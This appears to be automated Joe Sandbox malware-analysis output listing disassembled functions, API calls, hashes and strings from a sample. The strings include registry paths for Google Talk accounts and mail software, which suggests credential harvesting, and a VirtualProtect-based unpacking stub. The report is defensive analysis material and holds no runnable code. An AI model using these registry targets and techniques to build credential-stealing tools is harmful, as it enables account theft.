                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4B2154B3D001285EEB11EA54DD42FDA77ACDF85308F0404EBB649F7041E678AF888A59

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 381 4034e4-403544 memset * 2 call 410b1e 384 403580-403582 381->384 385 403546-40357f _mbscpy call 406d55 _mbscat call 4033f0 381->385 385->384
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 00403504
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040351A
                                                                                                                                                                                                                                      • Part of subcall function 00410B1E: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                                                                                                                                                                                                                    • _mbscpy.MSVCRT(00000000,00000000), ref: 00403555
                                                                                                                                                                                                                                      • Part of subcall function 00406D55: strlen.MSVCRT ref: 00406D56
                                                                                                                                                                                                                                      • Part of subcall function 00406D55: _mbscat.MSVCRT ref: 00406D6D
                                                                                                                                                                                                                                    • _mbscat.MSVCRT ref: 0040356D
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000004.00000002.29881343409.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: _mbscatmemset$Close_mbscpystrlen
                                                                                                                                                                                                                                    • String ID: InstallPath$Software\Group Mail$fb.dat
                                                                                                                                                                                                                                    • API String ID: 3071782539-966475738
                                                                                                                                                                                                                                    • Opcode ID: e8255885af10a91bc56e48e40ef87396276e308e7910b77f5f681434f29254a3
                                                                                                                                                                                                                                    • Instruction ID: a2fd564f6d67a76fe1541fb13c78ccc0c8ee6374decffd3371ae058987aad369
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e8255885af10a91bc56e48e40ef87396276e308e7910b77f5f681434f29254a3
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C201FC7694416875E750F6659C47FCAB66CCB64705F0400A7BA48F30C2DAF8BBC486A9

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 390 40ccd7-40cd06 ??2@YAPAXI@Z 391 40cd08-40cd0d 390->391 392 40cd0f 390->392 393 40cd11-40cd24 ??2@YAPAXI@Z 391->393 392->393 394 40cd26-40cd2d call 404025 393->394 395 40cd2f 393->395 396 40cd31-40cd57 394->396 395->396 399 40cd66-40cdd9 call 407088 call 4019b5 memset LoadIconA call 4019b5 _mbscpy 396->399 400 40cd59-40cd60 DeleteObject 396->400 400->399
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT(00000014,00000000), ref: 0040CCFE
                                                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT(00001324,00000000), ref: 0040CD1C
                                                                                                                                                                                                                                    • DeleteObject.GDI32(?), ref: 0040CD5A
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040CD96
                                                                                                                                                                                                                                    • LoadIconA.USER32(00000065), ref: 0040CDA6
                                                                                                                                                                                                                                    • _mbscpy.MSVCRT(?,00000000,?,00000000), ref: 0040CDC4
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000004.00000002.29881343409.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: ??2@$DeleteIconLoadObject_mbscpymemset
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 2054149589-0
                                                                                                                                                                                                                                    • Opcode ID: fd02f05bf49073eee5ccc1a550db9cbce84ddbb83c717146c7427eb187f58741
                                                                                                                                                                                                                                    • Instruction ID: e49e2262ea613e2b532621416bf92f05b9d60d1a181aada648b692035ce2a44d
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fd02f05bf49073eee5ccc1a550db9cbce84ddbb83c717146c7427eb187f58741
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C921A1B0900360DBDB10DF749DC97897BA8EB40B04F1405BBED08FF286D7B895408BA8

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 407 44b40e-44b415 GetModuleHandleA 408 44b455 407->408 409 44b417-44b426 call 44b42b 407->409 411 44b457-44b45b 408->411 418 44b48d 409->418 419 44b428-44b433 GetProcAddress 409->419 413 44b45d-44b465 GetModuleHandleA 411->413 414 44b49a call 44b49f 411->414 417 44b467-44b46f 413->417 417->417 420 44b471-44b474 417->420 422 44b48e-44b496 418->422 419->408 423 44b435-44b442 VirtualProtect 419->423 420->411 421 44b476-44b478 420->421 424 44b47e-44b486 421->424 425 44b47a-44b47c 421->425 431 44b498 422->431 427 44b454 423->427 428 44b444-44b452 VirtualProtect 423->428 429 44b487-44b488 GetProcAddress 424->429 425->429 427->408 428->427 429->418 431->420
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetModuleHandleA.KERNEL32(0044B405), ref: 0044B40E
                                                                                                                                                                                                                                    • GetModuleHandleA.KERNEL32(?,0044B405), ref: 0044B460
                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 0044B488
                                                                                                                                                                                                                                      • Part of subcall function 0044B42B: GetProcAddress.KERNEL32(00000000,0044B41C), ref: 0044B42C
                                                                                                                                                                                                                                      • Part of subcall function 0044B42B: VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,0044B41C,0044B405), ref: 0044B43E
                                                                                                                                                                                                                                      • Part of subcall function 0044B42B: VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,0044B41C,0044B405), ref: 0044B452
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000004.00000002.29881343409.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: AddressHandleModuleProcProtectVirtual
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 2099061454-0
                                                                                                                                                                                                                                    • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                                                                                                                                                                    • Instruction ID: 5df47aada64e755ddaac71019e2cddcac14d14db73bdb0f929895f2225ac57a9
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DB012D01545A4179FF21AAB50C02ABB5F8CDA23364B145B4BF750CB293DB5CC90693FE

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                      • Part of subcall function 004082CD: memset.MSVCRT ref: 0040832F
                                                                                                                                                                                                                                      • Part of subcall function 004082CD: memset.MSVCRT ref: 00408343
                                                                                                                                                                                                                                      • Part of subcall function 004082CD: memset.MSVCRT ref: 0040835F
                                                                                                                                                                                                                                      • Part of subcall function 004082CD: memset.MSVCRT ref: 00408376
                                                                                                                                                                                                                                      • Part of subcall function 004082CD: GetComputerNameA.KERNEL32(?,?), ref: 00408398
                                                                                                                                                                                                                                      • Part of subcall function 004082CD: GetUserNameA.ADVAPI32(?,?), ref: 004083AC
                                                                                                                                                                                                                                      • Part of subcall function 004082CD: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083CB
                                                                                                                                                                                                                                      • Part of subcall function 004082CD: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083E0
                                                                                                                                                                                                                                      • Part of subcall function 004082CD: strlen.MSVCRT ref: 004083E9
                                                                                                                                                                                                                                      • Part of subcall function 004082CD: strlen.MSVCRT ref: 004083F8
                                                                                                                                                                                                                                      • Part of subcall function 00410A9C: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00410E4A,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 00410AAF
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 00408620
                                                                                                                                                                                                                                      • Part of subcall function 00410B62: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 00408671
                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,?), ref: 004086AF
                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 004086D6
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    • Software\Google\Google Talk\Accounts, xrefs: 004085F1
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000004.00000002.29881343409.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: memset$ByteCharCloseMultiNameWidestrlen$ComputerEnumOpenUser
                                                                                                                                                                                                                                    • String ID: Software\Google\Google Talk\Accounts
                                                                                                                                                                                                                                    • API String ID: 1366857005-1079885057
                                                                                                                                                                                                                                    • Opcode ID: 714fcd6f1c4457602f236ccea557fa2655140a2be8e65fd4c30709a0660f34b2
                                                                                                                                                                                                                                    • Instruction ID: c9a55fd20ea1a9e1148d2ba128c2c272dfe10edd9ec9a97c612e1cc238572be2
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 714fcd6f1c4457602f236ccea557fa2655140a2be8e65fd4c30709a0660f34b2
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6E2181B140830AAEE610EF51DD42EAFB7DCEF94344F00083EB984D1192E675D95D9BAB

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 455 40ba28-40ba3a 456 40ba87-40ba9b call 406c62 455->456 457 40ba3c-40ba52 call 407e20 _mbsicmp 455->457 479 40ba9d call 4107f1 456->479 480 40ba9d call 404734 456->480 481 40ba9d call 404785 456->481 482 40ba9d call 403c16 456->482 483 40ba9d call 410a9c 456->483 462 40ba54-40ba6d call 407e20 457->462 463 40ba7b-40ba85 457->463 468 40ba74 462->468 469 40ba6f-40ba72 462->469 463->456 463->457 464 40baa0-40bab3 call 407e30 472 40bab5-40bac1 464->472 473 40bafa-40bb09 SetCursor 464->473 471 40ba75-40ba76 call 40b5e5 468->471 469->471 471->463 475 40bac3-40bace 472->475 476 40bad8-40baf7 qsort 472->476 475->476 476->473 479->464 480->464 481->464 482->464 483->464
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000004.00000002.29881343409.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Cursor_mbsicmpqsort
                                                                                                                                                                                                                                    • String ID: /nosort$/sort
                                                                                                                                                                                                                                    • API String ID: 882979914-1578091866
                                                                                                                                                                                                                                    • Opcode ID: c670c5a1dac652336fc4502d32cc243de18414890d70e9aadfbf467d7e8899fc
                                                                                                                                                                                                                                    • Instruction ID: 8a1fc52e493d51bfa0df36ad286e8752cb28bf69c391dd95ac0f49afa8242728
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c670c5a1dac652336fc4502d32cc243de18414890d70e9aadfbf467d7e8899fc
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2D2192B1704601EFD719AF75C880A69B7A9FF48318B10027EF419A7291CB39BC12CBD9
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetModuleHandleA.KERNEL32(?,0044B405), ref: 0044B460
                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 0044B488
                                                                                                                                                                                                                                      • Part of subcall function 0044B40E: GetModuleHandleA.KERNEL32(0044B405), ref: 0044B40E
                                                                                                                                                                                                                                      • Part of subcall function 0044B40E: GetProcAddress.KERNEL32(00000000,0044B41C), ref: 0044B42C
                                                                                                                                                                                                                                      • Part of subcall function 0044B40E: VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,0044B41C,0044B405), ref: 0044B43E
                                                                                                                                                                                                                                      • Part of subcall function 0044B40E: VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,0044B41C,0044B405), ref: 0044B452
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000004.00000002.29881343409.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: AddressHandleModuleProcProtectVirtual
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 2099061454-0
                                                                                                                                                                                                                                    • Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                                                                                                                                                                                    • Instruction ID: 9d5022db8ba3b04779ac2e9664088e7462d9cf1087a2f4409b49694314ac1291
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FB21F7114496816FFB218BB84C017B67BD8DB13364F19469BE184CB243D76CD85693FA
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,0044B41C), ref: 0044B42C
                                                                                                                                                                                                                                    • VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,0044B41C,0044B405), ref: 0044B43E
                                                                                                                                                                                                                                    • VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,0044B41C,0044B405), ref: 0044B452
                                                                                                                                                                                                                                    • GetModuleHandleA.KERNEL32(?,0044B405), ref: 0044B460
                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 0044B488
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000004.00000002.29881343409.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: AddressProcProtectVirtual$HandleModule
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 2152742572-0
                                                                                                                                                                                                                                    • Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                                                                                                                                                                                    • Instruction ID: 565c9894d902a96607ae12053a83652f4dbbb150929c791eaa1536a67b179355
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 83F0C201589A407DFE2155B50C42ABB5B8CCA27320B244B07F654CB383D79DC91A93FA
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                      • Part of subcall function 00410D0E: LoadLibraryA.KERNEL32(shell32.dll,0040CF6F,75C50A60,?,00000000), ref: 00410D1C
                                                                                                                                                                                                                                      • Part of subcall function 00410D0E: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 00410D31
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 00410E10
                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,?,?,00000104), ref: 00410E79
                                                                                                                                                                                                                                    • _mbscpy.MSVCRT(00000000,?,?,?,?,?,?,00000104), ref: 00410E87
                                                                                                                                                                                                                                      • Part of subcall function 004070AE: GetVersionExA.KERNEL32(0045A3B0,0000001A,00410DD9,00000104), ref: 004070C8
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00410E2B, 00410E3B
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000004.00000002.29881343409.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: AddressCloseLibraryLoadProcVersion_mbscpymemset
                                                                                                                                                                                                                                    • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                                                                                                                                                                                    • API String ID: 889583718-2036018995
                                                                                                                                                                                                                                    • Opcode ID: 20c56a313fda590c221b6e52e0c08165982b45312d52e9976c101796b2ccff0c
                                                                                                                                                                                                                                    • Instruction ID: 345612a4203e2947e26158410096d7c3d27216bde768142914c78e2e12d87323
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 20c56a313fda590c221b6e52e0c08165982b45312d52e9976c101796b2ccff0c
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 89110D71C40318EBEB20B6D59C86EEF77ACDB14304F1404A7F555A2112E7BC9ED8C69A
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • FindResourceA.KERNEL32(?,?,?), ref: 00410C75
                                                                                                                                                                                                                                    • SizeofResource.KERNEL32(?,00000000), ref: 00410C86
                                                                                                                                                                                                                                    • LoadResource.KERNEL32(?,00000000), ref: 00410C96
                                                                                                                                                                                                                                    • LockResource.KERNEL32(00000000), ref: 00410CA1
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000004.00000002.29881343409.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Resource$FindLoadLockSizeof
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3473537107-0
                                                                                                                                                                                                                                    • Opcode ID: bd954622ed218253ef2d1b1e463bd565b46b01af85fc050a190cf1e92aec0d28
                                                                                                                                                                                                                                    • Instruction ID: 06b8370cebe37c7de172ca18b7cbf64f7437cd91f528590ddf6fb1777473d23a
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bd954622ed218253ef2d1b1e463bd565b46b01af85fc050a190cf1e92aec0d28
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 090196367012166F8B185F69DD9489F7EAEFB853913084136FC05C6361EB71C9818ED8
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 004109F7
                                                                                                                                                                                                                                      • Part of subcall function 004075CD: sprintf.MSVCRT ref: 00407605
                                                                                                                                                                                                                                      • Part of subcall function 004075CD: memcpy.MSVCRT(?,00000000,00000003,00000000,%2.2X ,?), ref: 00407618
                                                                                                                                                                                                                                    • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 00410A1B
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 00410A32
                                                                                                                                                                                                                                    • GetPrivateProfileStringA.KERNEL32(?,?,0044C52F,?,00002000,?), ref: 00410A50
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000004.00000002.29881343409.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: PrivateProfileStringmemset$Writememcpysprintf
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3143880245-0
                                                                                                                                                                                                                                    • Opcode ID: 886dc5ecc355c3466c5937889f3c24e8c73449ac36ec953dbb08d3698ea6811a
                                                                                                                                                                                                                                    • Instruction ID: 950c872411b2f2d44c5e3370b52dcf3132a88c3cdc41bb294f16927293e6b240
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 886dc5ecc355c3466c5937889f3c24e8c73449ac36ec953dbb08d3698ea6811a
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A401A172804319BBEF119F50DC86EDB7B7CEF05344F0000A6F604A2052E635AA64CBA9
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000004.00000002.29881343409.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: ??3@
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 613200358-0
                                                                                                                                                                                                                                    • Opcode ID: 0ad1635ea08d581da3d46e9cfe4a801b3f478eb4f35f0f6f88290fc2b5bda708
                                                                                                                                                                                                                                    • Instruction ID: 5841ab7dcc50b440abd9236b7832042a9d7d1d7b8957bb774bcacf87f05c1f29
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0ad1635ea08d581da3d46e9cfe4a801b3f478eb4f35f0f6f88290fc2b5bda708
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AAE046A134974456BA10AF7BAC52F13239CEA803523168C6FB800F36D2EF2CE890846C
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT(00008000,00408DC4,00409CE2,?,?,?,?,?,00000000,75C50A60), ref: 00408D5C
                                                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT(00000000,00008000,00408DC4,00409CE2,?,?,?,?,?,00000000,75C50A60), ref: 00408D7A
                                                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00008000,00408DC4,00409CE2,?,?,?,?,?,00000000,75C50A60), ref: 00408D98
                                                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00008000,00408DC4,00409CE2,?,?,?,?,?,00000000,75C50A60), ref: 00408DA8
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000004.00000002.29881343409.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: ??2@
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 1033339047-0
                                                                                                                                                                                                                                    • Opcode ID: 13d41e296071d90ab44a737b93fda326391e3e8b074f3b81c3e25c1d737bd7ac
                                                                                                                                                                                                                                    • Instruction ID: b7305a6f8e60e4354fc193aeb8e5872e67636dbc7b7f4d43fc505f02bd19535d
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 13d41e296071d90ab44a737b93fda326391e3e8b074f3b81c3e25c1d737bd7ac
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EEF031F05433615EEB559F34ED0672536A4E784302F024B3EE2059A2E6EB78D4908B09
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • malloc.MSVCRT ref: 00406F4C
                                                                                                                                                                                                                                    • memcpy.MSVCRT(00000000,00000000,00000000,00000000,75C50A60,00407A43,00000001,?,00000000,75C50A60,00407DBD,00000000,?,?), ref: 00406F64
                                                                                                                                                                                                                                    • free.MSVCRT ref: 00406F6D
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000004.00000002.29881343409.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: freemallocmemcpy
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3056473165-0
                                                                                                                                                                                                                                    • Opcode ID: f6360f64df0fef16feaa284e534344f6101794aca07d62af19e0e66fd0e0db42
